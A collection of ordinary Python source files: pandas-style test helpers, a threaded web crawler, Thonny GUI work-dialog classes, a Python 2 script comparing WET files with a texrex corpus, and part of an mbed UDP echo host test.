nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = round((1 - density) * nrows * ncols)
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: list[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
def external_error_raised(expected_exception: type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.common._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from com._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : str
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
# -----------------------------------------------------------------------------
# Indexing test helpers
def getitem(x):
return x
def setitem(x):
return x
def loc(x):
return x.loc
def iloc(x):
return x.iloc
def at(x):
return x.at
def iat(x):
return x.iat
|
threaded_crawler.py
|
import time
import threading
import urllib.parse
from downloader import Downloader
from mongo_queue import MongoQueue
SLEEP_TIME = 1
USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36'
def threaded_crawler(seed_url, delay=5, cache=None, scrape_callback=None,
user_agent=USER_AGENT, proxies=None, num_retries=1,
max_threads=10, timeout=60):
"""Crawl this website in multiple threads
"""
# the queue of URLs that still need to be crawled
crawl_queue = MongoQueue()
crawl_queue.push(seed_url)
def process_queue():
while True:
# keep track that are processing url
try:
url = crawl_queue.pop()
except KeyError:
# currently no urls to process
break
else:
html = D(url)
if scrape_callback:
try:
links = scrape_callback(url, html) or []
except Exception as e:
print('Error in callback for: {}: {}'.format(url, e))
else:
for link in links:
link = normalize(seed_url, link)
# check whether already crawled this link
if link not in seen:
seen.add(link)
# add this new link to queue
crawl_queue.append(link)
crawl_queue.complete(url)
# wait for all download threads to finish
threads = []
while threads or crawl_queue:
# the crawl is still active
for thread in threads:
if not thread.is_alive():
# remove the stopped threads
threads.remove(thread)
while len(threads) < max_threads and crawl_queue:
# can start some more threads
thread = threading.Thread(target=process_queue)
# set daemon so main thread can exit when receives ctrl-c
thread.setDaemon(True)
thread.start()
threads.append(thread)
# all threads have been processed
# sleep temporarily so CPU can focus execution on other threads
time.sleep(SLEEP_TIME)
def normalize(seed_url, link):
"""Normalize this URL by removing hash and adding domain
"""
link, _ = urllib.parse.urldefrag(link) # remove hash to avoid duplicates
return urllib.parse.urljoin(seed_url, link)
|
workdlg.py
|
from logging import getLogger
import os
import queue
import signal
import subprocess
import threading
import time
import tkinter as tk
from tkinter import ttk, messagebox
from typing import Optional
from thonny import tktextext
from thonny.languages import tr
from thonny.misc_utils import running_on_windows
from thonny.ui_utils import CommonDialog, ems_to_pixels, create_action_label, set_text_if_different
logger = getLogger(__name__)
class WorkDialog(CommonDialog):
def __init__(self, master, autostart=False):
super(WorkDialog, self).__init__(master)
self._autostart = autostart
self._state = "idle"
self.success = False
self._work_events_queue = queue.Queue()
self.init_instructions_frame()
self.init_main_frame()
self.init_action_frame()
self.init_log_frame()
self.populate_main_frame()
self.rowconfigure(4, weight=1) # log frame
self.columnconfigure(0, weight=1)
self.title(self.get_title())
self.stdout = ""
self.stderr = ""
self._update_scheduler = None
self._keep_updating_ui()
self.bind("<Escape>", self.on_cancel, True)
self.protocol("WM_DELETE_WINDOW", self.on_cancel)
if self._autostart:
self.on_ok()
def populate_main_frame(self):
pass
def is_ready_for_work(self):
return True
def init_instructions_frame(self):
instructions = self.get_instructions()
self.instructions_frame = ttk.Frame(self, style="Tip.TFrame")
self.instructions_frame.grid(row=0, column=0, sticky="nsew")
self.instructions_frame.rowconfigure(0, weight=1)
self.instructions_frame.columnconfigure(0, weight=1)
pad = self.get_padding()
self.instructions_label = ttk.Label(self, style="Tip.TLabel", text=instructions)
self.instructions_label.grid(row=0, column=0, sticky="w", padx=pad, pady=pad)
def get_instructions(self) -> Optional[str]:
return None
def init_main_frame(self):
self.main_frame = ttk.Frame(self)
self.main_frame.grid(row=1, column=0, sticky="nsew")
def init_action_frame(self):
padding = self.get_padding()
intpad = self.get_internal_padding()
self.action_frame = ttk.Frame(self)
self.action_frame.grid(row=2, column=0, sticky="nsew")
self._progress_bar = ttk.Progressbar(
self.action_frame, length=ems_to_pixels(4), mode="indeterminate"
)
self._current_action_label = create_action_label(
self.action_frame,
text="",
width=round(self.get_action_text_max_length() * 1.1),
click_handler=self.toggle_log_frame,
)
self._current_action_label.grid(
row=1, column=2, sticky="we", pady=padding, padx=(0, intpad)
)
self._ok_button = ttk.Button(
self.action_frame,
text=self.get_ok_text(),
command=self.on_ok,
state="disabled",
default="active",
)
if not self._autostart:
self._ok_button.grid(column=4, row=1, pady=padding, padx=(0, intpad))
self._cancel_button = ttk.Button(
self.action_frame,
text=self.get_cancel_text(),
command=self.on_cancel,
)
self._cancel_button.grid(column=5, row=1, padx=(0, padding), pady=padding)
self.action_frame.columnconfigure(2, weight=1)
def get_action_text_max_length(self):
return 35
def init_log_frame(self):
self.log_frame = ttk.Frame(self)
self.log_frame.columnconfigure(1, weight=1)
self.log_frame.rowconfigure(1, weight=1)
fixed_font = tk.font.nametofont("TkFixedFont")
font = fixed_font.copy()
font.configure(size=round(fixed_font.cget("size") * 0.8))
self.log_text = tktextext.TextFrame(
self.log_frame,
horizontal_scrollbar=False,
wrap="word",
borderwidth=1,
height=5,
width=20,
font=font,
read_only=True,
)
padding = self.get_padding()
self.log_text.grid(row=1, column=1, sticky="nsew", padx=padding, pady=(0, padding))
def update_ui(self):
if self._state == "closed":
return
while not self._work_events_queue.empty():
self.handle_work_event(*self._work_events_queue.get())
if self._state == "closed":
return
if self._state == "idle":
if self.is_ready_for_work():
self._ok_button.configure(state="normal")
else:
self._ok_button.configure(state="disabled")
else:
self._ok_button.configure(state="disabled")
if self._state == "done":
set_text_if_different(self._cancel_button, tr("Close"))
else:
set_text_if_different(self._cancel_button, tr("Cancel"))
def start_work(self):
pass
def get_title(self):
return "Work dialog"
def _keep_updating_ui(self):
if self._state != "closed":
self.update_ui()
self._update_scheduler = self.after(200, self._keep_updating_ui)
else:
self._update_scheduler = None
def close(self):
self._state = "closed"
if self._update_scheduler is not None:
try:
self.after_cancel(self._update_scheduler)
except tk.TclError:
pass
self.destroy()
def cancel_work(self):
# worker should periodically check this value
self._state = "cancelling"
self.set_action_text(tr("Cancelling"))
def toggle_log_frame(self, event=None):
if self.log_frame.winfo_ismapped():
self.log_frame.grid_forget()
self.rowconfigure(2, weight=1)
self.rowconfigure(4, weight=0)
else:
self.log_frame.grid(row=4, column=0, sticky="nsew")
self.rowconfigure(2, weight=0)
self.rowconfigure(4, weight=1)
def get_ok_text(self):
return tr("OK")
def get_cancel_text(self):
return tr("Cancel")
def on_ok(self, event=None):
assert self._state == "idle"
if self.start_work() is not False:
self._state = "working"
self.success = False
self.grid_progress_widgets()
self._progress_bar["mode"] = "indeterminate"
self._progress_bar.start()
if not self._current_action_label["text"]:
self._current_action_label["text"] = tr("Starting") + "..."
def grid_progress_widgets(self):
padding = self.get_padding()
intpad = self.get_internal_padding()
self._progress_bar.grid(row=1, column=1, sticky="w", padx=(padding, intpad), pady=padding)
def on_cancel(self, event=None):
if self._state in ("idle", "done"):
self.close()
elif self._state == "cancelling" and self.confirm_leaving_while_cancelling():
self.close()
elif self.confirm_cancel():
self.cancel_work()
def confirm_leaving_while_cancelling(self):
return messagebox.askyesno(
"Close dialog?",
"Cancelling is in progress.\nDo you still want to close the dialog?",
parent=self,
)
def confirm_cancel(self):
return messagebox.askyesno(
"Cancel work?",
"Are you sure you want to cancel?",
parent=self,
)
def append_text(self, text: str, stream_name="stdout") -> None:
"""Appends text to the details box. May be called from another thread."""
self._work_events_queue.put(("append", (text, stream_name)))
setattr(self, stream_name, getattr(self, stream_name) + text)
def replace_last_line(self, text: str, stream_name="stdout") -> None:
"""Replaces last line in the details box. May be called from another thread."""
self._work_events_queue.put(("replace", (text, stream_name)))
setattr(self, stream_name, getattr(self, stream_name) + text)
def report_progress(self, value: float, maximum: float) -> None:
"""Updates progress bar. May be called from another thread."""
self._work_events_queue.put(("progress", (value, maximum)))
def set_action_text(self, text: str) -> None:
"""Updates text above the progress bar. May be called from another thread."""
self._work_events_queue.put(("action", (text,)))
def set_action_text_smart(self, text: str) -> None:
"""Updates text above the progress bar. May be called from another thread."""
text = text.strip()
if not text:
return
if len(text) > self.get_action_text_max_length():
text = text[: self.get_action_text_max_length() - 3] + "..."
self.set_action_text(text)
def report_done(self, success):
"""May be called from another thread."""
self._work_events_queue.put(("done", (success,)))
def handle_work_event(self, type, args):
if type in ("append", "replace"):
text, stream_name = args
if type == "replace":
self.log_text.text.direct_delete("end-1c linestart", "end-1c")
self.log_text.text.direct_insert("end", text, (stream_name,))
self.log_text.text.see("end")
elif type == "action":
set_text_if_different(self._current_action_label, args[0])
elif type == "progress":
value, maximum = args
if value is None or maximum is None:
if self._progress_bar["mode"] != "indeterminate":
self._progress_bar["mode"] = "indeterminate"
self._progress_bar.start()
else:
if self._progress_bar["mode"] != "determinate":
self._progress_bar["mode"] = "determinate"
self._progress_bar.stop()
self._progress_bar.configure(value=value, maximum=maximum)
elif type == "done":
self.on_done(args[0])
def on_done(self, success):
"""NB! Don't call from non-ui thread!"""
self.success = success
if self.success:
self._state = "done"
self._cancel_button.focus_set()
self._cancel_button["default"] = "active"
self._ok_button["default"] = "normal"
elif self._autostart:
# Can't try again if failed with autostart
self._state = "done"
self._cancel_button.focus_set()
self._cancel_button["default"] = "active"
self._ok_button["default"] = "normal"
else:
# allows trying again when failed
self._state = "idle"
self._ok_button.focus_set()
self._ok_button["default"] = "active"
self._cancel_button["default"] = "normal"
self._progress_bar.stop()
# need to put to determinate mode, otherwise it looks half done
self._progress_bar["mode"] = "determinate"
if self.success and self._autostart and not self.log_frame.winfo_ismapped():
self.close()
if not self.success and not self.log_frame.winfo_ismapped():
self.toggle_log_frame()
class SubprocessDialog(WorkDialog):
"""Shows incrementally the output of given subprocess.
Allows cancelling"""
def __init__(self, master, proc, title, long_description=None, autostart=True):
self._proc = proc
self.stdout = ""
self.stderr = ""
self._stdout_thread = None
self._stderr_thread = None
self._title = title
self._long_description = long_description
self.returncode = None
super().__init__(master, autostart=autostart)
def is_ready_for_work(self):
return True
def get_title(self):
return self._title
def get_instructions(self) -> Optional[str]:
return self._long_description
def start_work(self):
if hasattr(self._proc, "cmd"):
try:
self.append_text(subprocess.list2cmdline(self._proc.cmd) + "\n")
except:
logger.warning("Could not extract cmd (%s)", self._proc.cmd)
self._start_listening_current_proc()
def _start_listening_current_proc(self):
def listen_stream(stream_name):
stream = getattr(self._proc, stream_name)
while True:
data = stream.readline()
self.append_text(data, stream_name)
self._check_set_action_text_from_output_line(data)
setattr(self, stream_name, getattr(self, stream_name) + data)
if data == "":
logger.debug("Finished reading %s", stream_name)
break
if stream_name == "stdout":
self._finish_process()
logger.debug("Returning from reading %s", stream_name)
self._stdout_thread = threading.Thread(target=listen_stream, args=["stdout"], daemon=True)
self._stdout_thread.start()
if self._proc.stderr is not None:
self._stderr_thread = threading.Thread(
target=listen_stream, args=["stderr"], daemon=True
)
self._stderr_thread.start()
def _finish_process(self):
self.returncode = self._proc.wait()
logger.debug("Process ended with returncode %s", self.returncode)
if self.returncode:
self.set_action_text("Error")
self.append_text("Error: process returned with code %s\n" % self.returncode)
else:
self.set_action_text("Done!")
self.append_text("Done!")
self.report_done(self.returncode == 0)
def get_action_text_max_length(self):
return 35
def _check_set_action_text_from_output_line(self, line):
if len(line) > self.get_action_text_max_length():
line = line[: self.get_action_text_max_length() - 3].strip() + "..."
if line:
self.set_action_text(line.strip())
def cancel_work(self):
super().cancel_work()
# try gently first
try:
try:
if running_on_windows():
os.kill(self._proc.pid, signal.CTRL_BREAK_EVENT) # pylint: disable=no-member
else:
os.kill(self._proc.pid, signal.SIGINT)
self._proc.wait(2)
except subprocess.TimeoutExpired:
if self._proc.poll() is None:
# now let's be more concrete
self._proc.kill()
except OSError as e:
messagebox.showerror("Error", "Could not kill subprocess: " + str(e), master=self)
logger.error("Could not kill subprocess", exc_info=e)
|
compare.py
|
import argparse
import re
import cld2full as cld
from collections import OrderedDict
import xml.etree.cElementTree as cet
import time
import nltk
html_entities = eval(open("html-entities.lst", "r").read())
def read_document(f, documents):
doc = ""
url = ""
while True:
line = f.readline()
if line == "":
return False
doc += line
if line.startswith("<doc"):
match = re.match(r'<doc (?:\w|\"|\d|=|\s)*url=\"(.+?)\"', line)
url = match.group(1)
elif line.startswith("</doc>"):
break
documents.append((url, doc))
return True
def read_corpus(corpus):
f = open(corpus, "r")
documents = []
hasNext = True
while hasNext:
hasNext = read_document(f, documents)
return sorted(documents, key=lambda k: k[0])
def parse_corpus(corpus):
docs = []
doc = ""
err = 0
for event, elem in cet.iterparse(corpus):
if elem.tag == "metrics":
if not elem.tail == None:
doc += elem.tail
if elem.tag == "doc":
url = elem.attrib['url']
#try:
docs.append((url, doc.encode("utf-8")))
#except:
#err += 1
doc = ""
elem.clear()
print err
return sorted(docs, key=lambda k: k[0])
def read_wet_header_and_skip_info(f):
info = f.readline()
url = ""
length = 0
if info.split()[1] == "warcinfo":
while True:
line = f.readline()
if line.startswith("WARC/1.0"):
return read_wet_header_and_skip_info(f)
else:
url = f.readline().split()[1]
while True:
line = f.readline()
if line.startswith("Content-Length"):
length = int(line.split()[1])
elif not (line.startswith("WARC") or line.startswith("Content")):
return (url, length)
def read_wet_doc(f, documents):
doc = ""
url = ""
while True:
line = f.readline()
if line.startswith("WARC/1.0"):
url, length = read_wet_header_and_skip_info(f)
doc = f.read(length)
documents.append((url, doc))
return True
elif line == "":
return False
return True
def read_wet(wet):
f = open(wet, "r")
documents = []
hasNext = True
while hasNext:
hasNext = read_wet_doc(f, documents)
return sorted(documents, key=lambda k: k[0])
def alt_wet(wet):
f = open(wet, "r")
docs = []
doc = ""
while True:
line = f.readline()
if line.startswith("WARC/1.0"):
url, length = read_wet_header_and_skip_info(f)
if not doc.strip() == "":
docs.append((url, unicode(doc, encoding="utf-8").encode("utf-8")))
doc = ""
elif line == "":
return sorted(docs, key=lambda k: k[0])
else:
doc += line
def add_langs(doc, langs, langdocs, text=True):
success, length, languages = cld.detect(doc, text)
for lang in languages:
name, code, prc, score = lang
langs[name] = langs.get(name, 0.0) + length*prc/100
if prc > 0:
langdocs[name] = langdocs.get(name, 0) + 1
return length
def print_results(distr, cnt):
distr = OrderedDict(sorted(distr.items(), key=lambda t: t[1], reverse=True))
output = [["Language", "Doc #", "Ratio"]]
for entry in distr:
output.append([entry, distr[entry], float(distr[entry])/float(cnt)])
col_width = max(len(str(word)) for row in output for word in row) + 2
result_string = ""
for row in output:
result_string += "".join(str(word).ljust(col_width) for word in row) + "\n"
return result_string
from HTMLParser import HTMLParser
from collections import defaultdict
from multiprocessing import Process, Value, Queue
def find_html_tags(docs, progress, results, tagdicts, avail, num, idx):
tags = defaultdict(int)
entities = defaultdict(int)
ntagdocs = defaultdict(int)
nentitydocs = defaultdict(int)
ntags = {}
nentities = {}
class MyHTMLParser(HTMLParser):
def tag_is_relevant(self, tag):
tags = ['a', 'abbr', 'acronym', 'address', 'applet', 'area',
'aside', 'audio', 'b', 'base', 'basefont', 'bdi',
'bdo', 'big', 'blockquote', 'body', 'br', 'button',
'canvas', 'caption', 'center', 'cite', 'code', 'col',
'colgroup', 'datalist', 'dd', 'del', 'details', 'dfn',
'dialog', 'dir', 'div', 'dl', 'dt', 'em', 'embed',
'fieldset', 'figcaption', 'figure', 'font', 'footer',
'form', 'frame', 'frameset', 'h1', 'h2', 'h3', 'h4', 'h5',
'h6', 'head', 'header', 'hr', 'html', 'i', 'iframe', 'img',
'input', 'ins', 'kbd', 'keygen', 'label', 'legend', 'li',
'link', 'main', 'map', 'mark', 'menu', 'menuitem', 'meta',
'meter', 'nav', 'noframes', 'noscript', 'object', 'ol',
'optgroup', 'option', 'output', 'p', 'param', 'pre', 'progress',
'q', 'rp', 'rt', 'ruby', 's', 'samp', 'script', 'section',
'select', 'small', 'source', 'span', 'strike', 'strong', 'style',
'sub', 'summary', 'sup', 'table', 'tbody', 'td', 'textarea',
'tfoot', 'th', 'thead', 'time', 'title', 'tr', 'track', 'tt',
'u', 'ul', 'var', 'video', 'wbr']
return tag in tags
def entity_is_relevant(self, entity):
global html_entities
return entity in html_entities
def handle_starttag(self, tag, attrs):
if self.tag_is_relevant(tag):
tags[tag] += 1
ntags[0] += 1
def handle_entityref(self, name):
if self.entity_is_relevant(name):
entities[name] += 1
nentities[0] += 1
parser = MyHTMLParser()
local_cnt = 0
cnt = 0
for doc in docs:
ntags[0] = 0
nentities[0] = 0
if local_cnt % 100 == 0:
available = avail.get()
if available > 0 and len(docs)-local_cnt > 150:
results.put((tags, entities))
tagdicts.put((ntagdocs, nentitydocs))
avail.put(available-1)
resultcnt = num.get()
num.put(resultcnt+2)
remaining = docs[local_cnt:]
new_idx1 = str(idx) + "(1)"
new_idx2 = str(idx) + "(2)"
p_one = Process(target=find_html_tags, args=(remaining[0:len(remaining)/2],
progress, results, tagdicts,
avail, num, new_idx1))
p_two = Process(target=find_html_tags, args=(remaining[len(remaining)/2:],
progress, results, tagdicts,
avail, num, new_idx2))
#print "Process finished. Split another in two. avail: ", available, " num: ", resultcnt
p_one.start()
p_two.start()
return tags
avail.put(available)
err = 0
url, txt = doc
try:
parser.feed(txt)
except:
err = 1
ntagdocs[url] = ntags[0]
nentitydocs[url] = nentities[0]
cnt, errs = progress.get()
if cnt % 5000 == 0:
print "cnt, errs:", cnt, errs
#if local_cnt % 5000 == 0:
#print "index, cnt: ", idx, local_cnt
#print "\tremaining: ", len(docs)-local_cnt
cnt += 1
local_cnt += 1
progress.put((cnt, errs+err))
results.put((tags, entities))
tagdicts.put((ntagdocs, nentitydocs))
avail.put(avail.get()+1)
return tags
def merge_results(result):
procs = len(result)
print "Merging results..."
merged = result[0]
for i in xrange(1, procs):
p_res = result[i]
for key, value in p_res.items():
if key not in merged:
merged[key] = p_res[key]
else:
merged[key] = merged[key] + p_res[key]
print "Results merged"
return merged
def merge_dicts(dicts):
merged = dicts[0]
for i in xrange(1, len(dicts)):
for key, value in dicts[i][0].items():
merged[0][key] = value
for key, value in dicts[i][1].items():
merged[1][key] = value
return merged
def calc_std_dev(d):
s = 0.0
count = 0
for key, value in d.items():
s += value
if not value == 0:
count += 1
mean = s/len(d)
diffsum = 0.0
for key, value in d.items():
diff = (value - mean) ** 2
diffsum += diff
variance = diffsum / len(d)
stddev = variance ** (0.5)
return (s, count, mean, stddev)
def html_tags_parallell(docs, procs=1):
final_tags = []
final_entities = []
tagsandentities = []
total_length = len(docs)
progress = Queue()
progress.put((0, 0))
results = Queue()
avail = Queue()
tagdicts = Queue()
avail.put(0)
num = Queue()
num.put(procs)
begin = 0
end = len(docs) / procs
idx = 0
print "Started threads"
for i in xrange(procs):
idx += 1
p_docs = docs[begin:end]
p = Process(target=find_html_tags, args=(p_docs, progress,
results, tagdicts, avail,
num, idx))
p.start()
begin = end
end = end + len(docs) / procs
if i == procs - 2:
end = len(docs)
while True:
prog, errs = progress.get()
if prog == total_length:
break
progress.put((prog, errs))
number = num.get()
for i in xrange(number):
tags, entities = results.get()
final_tags.append(tags)
final_entities.append(entities)
tagsandentities.append(tagdicts.get())
print "THREADS MERGED"
merged_tags = merge_results(final_tags)
merged_entities = merge_results(final_entities)
m_dicts = merge_dicts(tagsandentities)
ntagdocs, nentitydocs = m_dicts
return (merged_tags, merged_entities, ntagdocs, nentitydocs)
def format_parse_result(html, headline):
s = 0.0
for key, value in html.items():
s += value
distr = OrderedDict(sorted(html.items(), key=lambda t: t[1], reverse=True))
output = [[headline, "Doc #", "Ratio"]]
for entry in distr:
output.append([entry, html[entry], float(html[entry])/float(s)])
col_width = max(len(str(word)) for row in output for word in row) + 2
result_string = ""
for row in output:
result_string += "".join(str(word).ljust(col_width) for word in row) + "\n"
return result_string
def output_parse_result(html, distr, headline, out):
result_string = format_parse_result(html, headline)
sum, count, mean, stddev = calc_std_dev(distr)
o = open(out, "w+")
o.write(result_string)
o.write("\n\n")
o.write("Total no. of " + headline + ": " + str(sum) + "\n")
o.write("Number of documents with " + headline + "s: " + str(count))
o.write("Average per document: " + str(mean)+ "\n")
o.write("Standard deviation: " + str(stddev) + "\n")
o.close()
def get_intersection(corpus, wet):
i = 0
j = 0
similar = []
while i < len(corpus) and j < len(wet):
corpurl = corpus[i][0].strip()
weturl = wet[j][0].strip()
if corpurl == weturl:
i += 1
j += 1
similar.append(wet[j])
elif corpurl > weturl:
j += 1
elif corpurl < weturl:
i += 1
return similar
def perform_lang_id(docs, o, dtype):
langs = {}
langdocs = {}
errors = 0
total_length = 0
for doc in docs:
try:
total_length += add_langs(doc[1], langs, langdocs, text=True)
except:
errors += 1
print "Counted language distribution of", len(docs), dtype
o.write(dtype + ": " +str(len(docs))+"\n")
o.write("# UTF-8 Errors: "+str(errors)+"\n")
o.write(print_results(langs, total_length)+"\n")
o.write("\n"+"How many docs was language l seen in?:\n")
s = 0
for key, value in langdocs.items():
s += value
o.write(print_results(langdocs, s))
o.write("\n\n")
def count_langs_write_to_file(corpus_documents, wet_documents, intersection, output):
o = open(output, "w+")
perform_lang_id(corpus_documents, o, "texrex documents")
perform_lang_id(wet_documents, o, "WET documents")
perform_lang_id(intersection, o, "documents from WET that is also in texrex")
o.close()
def count_tokens(docs, dtype, o):
tokens = {}
errors = 0
cnt = 0
for url, doc in docs:
try:
tokens[url] = len(nltk.word_tokenize(doc))
except:
errors += 1
sum, count, mean, stddev = calc_std_dev(tokens)
o.write(dtype + " tokens:\n")
o.write("total amount: " + str(sum) + "\n")
o.write("average per doc: " + str(mean) + "\n")
o.write("standard deviation: " + str(stddev) + "\n")
o.write("Encoding errors: " + str(errors) + "\n")
def write_token_amount_to_file(corpus_documents, wet_documents, intersection, output):
o = open("token_"+output, "w+")
count_tokens(corpus_documents, "texrex documents", o)
count_tokens(wet_documents, "WET documents", o)
count_tokens(intersection, "documents from WET that is also in texrex", o)
def perform_count_and_output(docs, processes, outputfilename):
tags, entities, tag_distr, entity_distr = html_tags_parallell(docs, procs=processes)
output_parse_result(tags, tag_distr, "Tag", "tag_"+outputfilename)
output_parse_result(entities, entity_distr, "Entity", "entity_"+outputfilename)
def compare(wet, corpus, output, procs):
corpus_docs = parse_corpus(corpus)
print "Read corpus"
wet_documents = alt_wet(wet)
print "Read WET file"
wet_intersection = get_intersection(corpus_docs, wet_documents)
wet_out = "wet_" + output
intersection_out = "intersection_wet_" + output
tex_out = "texrex_" + output
perform_count_and_output(wet_documents, procs, wet_out)
perform_count_and_output(corpus_docs, procs, tex_out)
perform_count_and_output(wet_intersection, procs, intersection_out)
count_langs_write_to_file(corpus_docs, wet_documents, wet_intersection, "lang_"+output)
write_token_amount_to_file(corpus_docs, wet_documents, wet_intersection, output)
def main():
parser = argparse.ArgumentParser(description="Compare a WET file and a corpus created from the corresponding WARC file")
parser.add_argument("wet", help="the WET file to read")
parser.add_argument("corpus", help="the corpus file to be read")
parser.add_argument("--output", "-o", help="a filename for the different output stats files", default="compare.out")
parser.add_argument("--procs", "-p", help="how many processors can be run in parallel", default=12)
args = parser.parse_args()
compare(args.wet, args.corpus, args.output, args.procs)
if __name__ == "__main__":
main()
|
udp_shotgun.py
|
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
import socket
import json
import random
import itertools
import time
from sys import stdout
from threading import Thread
from SocketServer import BaseRequestHandler, UDPServer
from mbed_host_tests import BaseHostTest, event_callback
class UDPEchoClientHandler(BaseRequestHandler):
def handle(self):
""" UDP packet handler. Responds with multiple simultaneous packets
"""
data, sock = self.request
pattern = [ord(d) << 4 for d in data]
# Each byte in request indicates size of packet to receive
# Each packet size is shifted over by 4 to fit in a byte, which
# avoids any issues with endianess or decoding
for packet in pattern:
data = [random.randint(0, 255) for _ in range(packet-1)]
data.append(reduce(lambda a,b: a^b, data))
data = ''.join(map(chr, data))
sock.sendto(data, self.client_address)
# Sleep a tiny bit to compensate for local network
time.sleep(0.01)
class UDPEchoClientTest(BaseHostTest):
def __init__(self):
"""
Initialise test parameters.
:return:
"""
BaseHostTest.__init__(self)
self.SERVER_IP = None # Will be determined after knowing the target IP
self.SERVER_PORT = 0 # Let TCPServer choose an arbitrary port
self.server = None
self.server_thread = None
self.target_ip = None
@staticmethod
def find_interface_to_target_addr(target_ip):
"""
Finds IP address of the interface through which it is connected to the target.
:return:
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((target_ip, 0)) # Target IP, any port
except socket.error:
s.connect((target_ip, 8000)) # Target IP, 'random' port
ip = s.getsockname()[0]
s.close()
return ip
def setup_udp_server(self):
"""
sets up a UDP server for target to connect and send test data.
:return:
"""
# !NOTE: There should mechanism to assert in the host test
if self.SERVER_IP is None:
self.log("setup_udp_server() called before determining server IP!")
self.notify_complete(False)
# Returning none will suppress host test from printing success code
self.server = UDPServer((self.SERVER_IP, self.SERVER_PORT), UDPEchoClientHandler)
ip, port = self.server.server_address
self.SERVER_PORT = port
self.server.allow_reuse_address = True
self.log("HOST: Listening for UDP packets: " + self.SERVER_IP + ":" + str(self.SERVER_PORT))
self.server_thread = Thread(target=UDPEchoClientTest.server_thread_func, args=(self,))
self.server_thread.start()
@staticmethod
def server_thread_func(this):
"""
Thread function to run TCP server forever.
:param this:
:return:
"""
this.server.serve_forever()
@event_callback("target_ip")
def _callback_target_ip(self, key, value, timestamp):
"""
Callback to handle reception of target's IP address.
:param key:
:param value:
:param timestamp:
:return:
"""
self.target_ip = value
